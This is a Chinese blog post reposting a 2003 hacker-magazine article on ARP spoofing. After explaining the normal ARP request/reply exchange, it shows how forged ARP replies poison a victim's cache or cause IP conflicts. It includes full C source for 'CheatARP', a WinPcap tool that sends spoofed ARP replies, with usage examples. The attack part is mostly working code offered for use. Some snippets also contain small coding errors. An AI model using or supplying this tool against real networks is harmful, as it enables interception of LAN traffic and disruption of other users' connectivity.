最近要完成一個發送arp包的功能,以前沒做過封包發送的內容,查找了寫資料。不過看代碼,arp包的結構搞懂了,不知道為啥還要個頭,呵呵原來還要個以太網包頭。看來基礎知識還要加強啊,這里找了個寫的比較詳細的例子。
arp 欺騙的技術原理及應用<首發于黑客防線2003年11期>
WriteBy: LionD8
email: LionD8@126.com
Wesite: http://liond8.126.com
你知道,數據包在局域網上是怎么傳輸的嗎?是靠什么來傳輸的嗎?也許你會說是靠IP地址,那么你只正確了一半。其實真正在傳輸過程中是靠計算機的網卡地址即MAC來傳輸。
現在我們就用實例來模擬一下傳輸的全過程。現在有一臺計算機A(IP:192.168.85.1 MAC:AA-AA-AA-AA-AA-AA),另一臺計算機B(IP:192.168.85.100MAC:BB-BB-BB-BB-BB-BB)現在用A去 ping B。看見 Reply from 192.168.85.100:bytes=32 time<10ms TTL=32 這樣的信息。然后在運行中輸入arp -a,會看見 192.168.8.100 BB-BB-BB-BB-BB-BB dynamic這樣的信息。那就是arp高速緩存中IP地址和MAC地址的一個映射關系,在以太網中,數據傳遞靠的是MAC,而并不是IP地址。其實在這背后就隱藏著arp的秘密。你一定會問,網絡上這么多計算機,A是怎么找到B的?那么我們就來分析一下細節。首先A并不知道B在哪里,那么A首先就會發一個廣播的ARP請求,即目的MAC為FF-FF-FF-FF-FF-FF,目的IP為B的192.168.85.100,再帶上自己的源IP,和源MAC。那么一個網段上的所有計算機都會接收到來自A的ARP請求,由于每臺計算機都有自己唯一的MAC和IP,那么它會分析目的IP即192.168.85.100是不是自己的IP?如果不是,網卡會自動丟棄數據包。如果B接收到了,經過分析,目的IP是自己的,于是更新自己的ARP高速緩存,記錄下A的IP和MAC。然后B就會回應A一個ARP應答,就是把A的源IP,源MAC變成現在目的IP,和目的MAC,再帶上自己的源IP,源MAC,發送給A。當A機接收到ARP應答后,更新自己的ARP高速緩存,即把arp應答中的B機的源IP,源MAC的映射關系記錄在高速緩存中。那么現在A機中有B的MAC和IP,B機中也有A的MAC和IP。arp請求和應答過程就結束了。由于arp高速緩存是會定時自動更新的,在沒有靜態綁定的情況下,IP和MAC的映射關系會隨時間流逝自動消失。在以后的通信中,A在和B通信時,會首先察看arp高速緩存中有沒有B的IP和MAC的映射關系,如果有,就直接取得MAC地址,如果沒有就再發一次ARP請求的廣播,B再應答即重復上面動作。
好了在了解了上面基本arp通信過程后,現在來學習arp欺騙技術就好理解多了,計算機在接收到ARP應答的時候,不管有沒有發出ARP請求,都會更新自己的高速緩存。利用這點如果C機(IP:192.168.85.200MAC:CC-CC-CC-CC-CC-CC)偽裝成B機向A發出ARP應答,自己偽造B機的源MAC為CC-CC-CC-CC-CC-CC,源IP依舊偽造成B的IP即192.168.85.100,是那么A機的ARP緩存就會被我們偽造的MAC所更新,192.168.85.100對應的MAC就會變成CC-CC-CC-CC-CC-CC.如果A機再利用192.168.85.100即B的IP和B通信,實際上數據包卻發給了C機,B機根本就接收不到了。
下面給出一些程序實現的基本算法。先來給出ARP首部和請求應答的數據結構。如下:
以太網 | 以太網 | 幀 | 硬件 | 協議| 硬件 | 協議 | OP| 發送端 |發送端|目的以太|目的
目的地址| 源地址 | 類型| 類型 | 類型| 長度 | 長度 | |以太網地址| IP |網地址 | IP
6 6 2 2 2 1 1 2 6 4 6 4
|<---以太網首部---->|<-------------------28字節的ARP請求/應答------------->|
然后我們根據上面的數據結構定義兩個結構分別如下:
//定義一個以太網頭部

typedef struct ehhdr



{


UCHAR eh_dst[6]; /**//* destination ethernet addrress */


UCHAR eh_src[6]; /**//* source ethernet addresss */


USHORT eh_type; /**//* ethernet pachet type */

}EHHEADR, *PEHHEADR;

//28字節的ARP請求/應答

typedef struct arphdr



{


USHORT arp_hrd; /**//* format of hardware address */


USHORT arp_pro; /**//* format of protocol address */


UCHAR arp_hln; /**//* length of hardware address */


UCHAR arp_pln; /**//* length of protocol address */


USHORT arp_op; /**//* ARP/RARP operation */


UCHAR arp_sha[6]; /**//* sender hardware address */


ULONG arp_spa; /**//* sender protocol address */


UCHAR arp_tha[6]; /**//* target hardware address */


ULONG arp_tpa; /**//* target protocol address */

}ARPHEADR, *PARPHEADR;

//把上面定義的兩種結構封裝起來

typedef struct arpPacket



{

EHHEADR ehhdr;

ARPHEADR arphdr;

} ARPPACKET, *PARPPACKET;


那么我們自己打造的ARP結構就完成了,剩下的事情就是把我們打造好的結構按照我們的需求賦上值,然后通過適配器發送出去就OK了。
比如說我們要用C機,去欺騙A機,更新A的ARP緩存中192.168.85.100(B的IP)的MAC為C機的。
首先定義一個ARPPACKET結構:
ARPPACKET ARPPacket;
ARPPacket.ehhdr.eh_type=htons(0x0806); //數據類型ARP請求或應答
ARPPacket.arphdr.arp_hrd = htons(0x0001); //硬件地址為0x0001表示以太網地址
ARPPacket.arphdr.arp_pro = htons(0x0800); //協議類型字段為0x0800表示IP地址
ARPPacket.ehhdr.eh_dst=0xAAAAAAAAAAAA //A機的MAC
ARPPacket.ehhdr.eh_src=0xCCCCCCCCCCCC //C機的源MAC
ARPPacket.arphdr.arp_hln = 6;
ARPPacket.arphdr.arp_pln = 4;
ARPPacket.arphdr.arp_op = htons(0x0002); //ARP應答值為2
ARPPacket.arphdr.arp_spa = 0xCCCCCCCCCCCC //偽造的MAC,在這里C機用的自己的
ARPPacket.arphdr.arp_tha = 0xAAAAAAAAAAAA //
ARPPacket.arphdr.arp_spa =inet_addr("192.168.85.100"); //偽造B的IP地址
ARPPacket.arphdr.arp_tpa = inet_addr("192.168.85.1"); //目標A的IP地址
//把要發送的數據保存在一個緩沖區szPacketBuf中,到時候只要把szPacketBuf的數據發送出去就可以了。
memcpy(szPacketBuf, (char*)&ARPPacket, sizeof(ARPPacket));
要發送數據,首先得打開一個適配器,打開一個適配器又需要先獲得適配器的名字。如下:
PacketGetAdapterNames((char*)AdapterName, &AdapterLength); //取得所有適配器的名字.
LPPACKET lpAdapter =PacketOpenAdapter((LPTSTR) AdapterList[0]); //打開第一塊適配器
第一塊的下標是從0開始的。返回一個指針,它指向一個正確初始化了的ADAPTER Object
lpPacket = PacketAllocatePacket(); //為_PACKET結構分配內存。
PacketInitPacket(lpPacket, szPacketBuf, 60); //packet結構中的buffer設置為傳遞的szPacketBuf指針
PacketSetNumWrites(lpAdapter, 2); //設置發送次數為2次
//一切就緒發送:
PacketSendPacket(lpAdapter, lpPacket, TRUE); //通過打開的適配器把szPacketBuf的數據發送出去。
PacketFreePacket(lpPacket); //釋放_PACKET結構
PacketCloseAdapter(lpAdapter); //關閉適配器
然后 在A機上的運行中輸入arp -a 會發現原來的 192.168.85.100 BB-BB-BB-BB-BB-BB
變成 192.168.85.100 CC-CC-CC-CC-CC-CC 了。
另外利用ARP欺騙還可以進行IP沖突,網絡執行官就是利用的這個原理,下面只簡單介紹一下,如果A機接收到一個ARP應答,其中源IP是192.168.85.1(當然是偽造的),而MAC地址卻和A的MAC不同,那么A機就會認為同一個IP對應了兩臺計算機(因為發現了兩個不同的MAC地址)
那么就會出現IP沖突。
CheatARP <desIP> <desMac> <sourceIP> <sourceMac>
比如利用我做的工具:CheatARP 192.168.85.1 AAAAAAAAAAAA 192.168.85.1 BAAAAAAAAAAAA 那么A就會被沖突。
以上只是代碼實現的基本思路和核心代碼,有興趣的朋友可以看看我的源碼,源碼上也有比較詳盡的注釋。
源代碼:

/**//*

ARP 的欺騙的技術原理及應用

請先安裝 WinPcap_3_0_a.exe

測試環境2k。

實用平臺 NT,2K,XP

*/

#include "stdio.h"

#include "Packet32.h"

#include "wchar.h"


#define EPT_IP 0x0800 /**//* type: IP */


#define EPT_ARP 0x0806 /**//* type: ARP */


#define EPT_RARP 0x8035 /**//* type: RARP */


#define ARP_HARDWARE 0x0001 /**//* Dummy type for 802.3 frames */


#define ARP_REQUEST 0x0001 /**//* ARP request */


#define ARP_REPLY 0x0002 /**//* ARP reply */

#pragma comment(lib, "packet.lib")

#pragma comment(lib, "ws2_32.lib")

#pragma pack(push, 1)

//定義一個以太網頭部

typedef struct ehhdr



{


UCHAR eh_dst[6]; /**//* destination ethernet addrress */


UCHAR eh_src[6]; /**//* source ethernet addresss */


USHORT eh_type; /**//* ethernet pachet type */

}EHHEADR, *PEHHEADR;

//定義一個28字節的arp應答/請求

typedef struct arphdr



{


USHORT arp_hrd; /**//* format of hardware address */


USHORT arp_pro; /**//* format of protocol address */


UCHAR arp_hln; /**//* length of hardware address */


UCHAR arp_pln; /**//* length of protocol address */


USHORT arp_op; /**//* ARP/RARP operation */


UCHAR arp_sha[6]; /**//* sender hardware address */


ULONG arp_spa; /**//* sender protocol address */


UCHAR arp_tha[6]; /**//* target hardware address */


ULONG arp_tpa; /**//* target protocol address */

}ARPHEADR, *PARPHEADR;

//把上面定義的兩種結構封裝起來

typedef struct arpPacket



{

EHHEADR ehhdr;

ARPHEADR arphdr;

} ARPPACKET, *PARPPACKET;

#pragma pack(pop)

void Usage();

void ChangeMacAddr(char *p, UCHAR a[]);

void banner();

int main(int argc, char* argv[])



{

static CHAR AdapterList[10][1024];

TCHAR szPacketBuf[512];

UCHAR MacAddr[6];

LPADAPTER lpAdapter;

LPPACKET lpPacket;

WCHAR AdapterName[2048];

WCHAR *temp,*temp1;

ARPPACKET ARPPacket;

ULONG AdapterLength = 1024;

DWORD AdapterNum = 0;

DWORD nRetCode, i;

banner();

if(argc!=5)



{

Usage();

return 0;

}

//取得所有適配器的名字.

if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)



{

//AdapterName:一塊用戶負責分配的緩沖區,將把適配器的名字填充進去,

//一串用一個Unicode的"0"分隔的Unicode字符串,每一個都是一個網卡的名字

//AdapterLength:這塊緩沖區的大小

printf("Unable to retrieve the list of the adapters!");

return 0;

}

temp = AdapterName;

temp1=AdapterName;

i = 0;

//把AdapterName中的適配器,分個copy到AdapterList[]中,i從0開始為第一個

while ((*temp != '0')||(*(temp-1) != '0'))



{

if (*temp == '0')



{

memcpy(AdapterList[i],temp1,(temp-temp1)*sizeof(WCHAR));

temp1=temp+1;

i++;

}

temp++;

}

AdapterNum = i;

for (i = 0; i < AdapterNum; i++)

wprintf(L"%d- %s", i+1, AdapterList[i]);


/**//* 注意,在這里一定要選擇正確的適配器不然會自動重起 */


/**//* 我機器上的是 */


/**//* 1- _NdisWanIp */


/**//* 2- _{02C36709-5318-4861-86DE-A7A81118BFCC} */


/**//* 選擇類似第2項的那種 一定要注意哦! */

printf("select adapter number:");

scanf("%d",&i); //我是輸入的2

if(i>AdapterNum)



{

printf("Number error!");

return 0;

}

//打開剛剛選擇的那個適配器,AdapterList[i-1]為適配器名字

//如果打開成功,返回一個指針,它指向一個正確初始化了的ADAPTER Object。否則,返回NULL。

lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[i-1]);

if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))



{

nRetCode = GetLastError();

printf("Unable to open the driver, Error Code : %lx", nRetCode);

return 0;

}

//為_PACKET結構分配內存。如果執行成功,返回指向_PACKET結構的指針。否則,返回NULL。

lpPacket = PacketAllocatePacket();

if(lpPacket == NULL)



{

printf(":failed to allocate the LPPACKET structure.");

return 0;

}

memset(szPacketBuf, 0, sizeof(szPacketBuf)); //初始化szPacketBuf為0

ChangeMacAddr(argv[2], MacAddr); //MAC地址轉換

memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 6); //目的MAC地址

ChangeMacAddr(argv[4], MacAddr); //MAC地址轉換

memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 6); //源MAC地址。

ARPPacket.ehhdr.eh_type = htons(EPT_ARP); //數據類型ARP請求或應答

ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE); //硬件地址為0x0001表示以太網地址

ARPPacket.arphdr.arp_pro = htons(EPT_IP); //協議類型字段為0x0800表示IP地址

//硬件地址長度和協議地址長度分別指出硬件地址和協議地址的長度,

//以字節為單位。對于以太網上IP地址的ARP請求或應答來說,它們的值分別為6和4。

ARPPacket.arphdr.arp_hln = 6;

ARPPacket.arphdr.arp_pln = 4;

ARPPacket.arphdr.arp_op = htons(ARP_REPLY); //ARP請求值為1,ARP應答值為2,RARP請求值為3,RARP應答值為4

ChangeMacAddr(argv[4], MacAddr); //MAC地址轉換

memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 6); //偽造的MAC地址

ARPPacket.arphdr.arp_spa = inet_addr(argv[3]); //偽造的IP地址

ChangeMacAddr(argv[2], MacAddr); //MAC地址轉換

memset(ARPPacket.arphdr.arp_tha,0,6); //初始化0

memcpy(ARPPacket.arphdr.arp_tha , MacAddr, 6); //目標的MAC地址

ARPPacket.arphdr.arp_tpa = inet_addr(argv[1]); //目標的IP地址

//把剛剛自己偽造的ARPPACKET結構復制到szPacketBuf中

memcpy(szPacketBuf, (char*)&ARPPacket, sizeof(ARPPacket));

//初始化一個_PACKET結構,即將packet結構中的buffer設置為傳遞的szPacketBuf指針。

//lpPacket,指向一個_PACKET結構的指針。

//szPacketBuf,一個指向一塊用戶分配的緩沖區的指針。

//60,緩沖區的大小。這是一個讀操作從driver傳遞到應用的最大數據量。

PacketInitPacket(lpPacket, szPacketBuf, 60);

//設置發送次數2次

if(PacketSetNumWrites(lpAdapter, 2)==FALSE)



{

printf("warning: Unable to send more than one packet in a single write!");

}

//發送剛剛偽造的數據包

if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)



{

printf("Error sending the packets!");

return 0;

}

printf ("Send ok!");

PacketFreePacket(lpPacket); //釋放_PACKET結構

PacketCloseAdapter(lpAdapter); //關閉適配器

return 0;

}

void Usage()



{

printf("CheatARP <DstIP> <DstMAC> <SourceIP> <SourceMAC>");

printf("Such as:");

printf("CheatARP 192.168.85.1 FFFFFFFFFFFF 192.168.85.129 005056E9D042");

printf("CheatARP 192.168.85.1 005056E9D041 192.168.85.129 AAAAAAAAAAAA");

}

//把輸入的12字節的MAC字符串,轉變為6字節的16進制MAC地址

void ChangeMacAddr(char *p, UCHAR a[])



{

char* p1=NULL;

int i=0;

int high ,low;

char temp[1];

for (i=0; i<6; i++)



{

p1=p+1;

switch (*p1) //計算低位的16進進制



{

case 'A': low=10;

break;

case 'B': low=11;

break;

case 'C': low=12;

break;

case 'D': low=13;

break;

case 'E': low=14;

break;

case 'F': low=15;

break;

default: temp[0]=*p1;

low=atoi(temp); //如果為數字就直接轉變成對應的數值

}

switch (*p) //計算高位的16進制



{

case 'A': high=10;

break;

case 'B': high=11;

break;

case 'C': high=12;

break;

case 'D': high=13;

break;

case 'E': high=14;

break;

case 'F': high=15;

break;

default: temp[0]=*p;

high=atoi(temp); //如果為數字就直接轉變成對應的數值

}

p+=2; //指針指向下一個X(高)X(低)字符串

a[i]=high*16+low; //求和得16進制值

}

}

void banner()



{

printf("Made By LionD8.");

printf("www.hackerXfiles.com");

}


如轉載:請說明作者信息,表明首發刊物。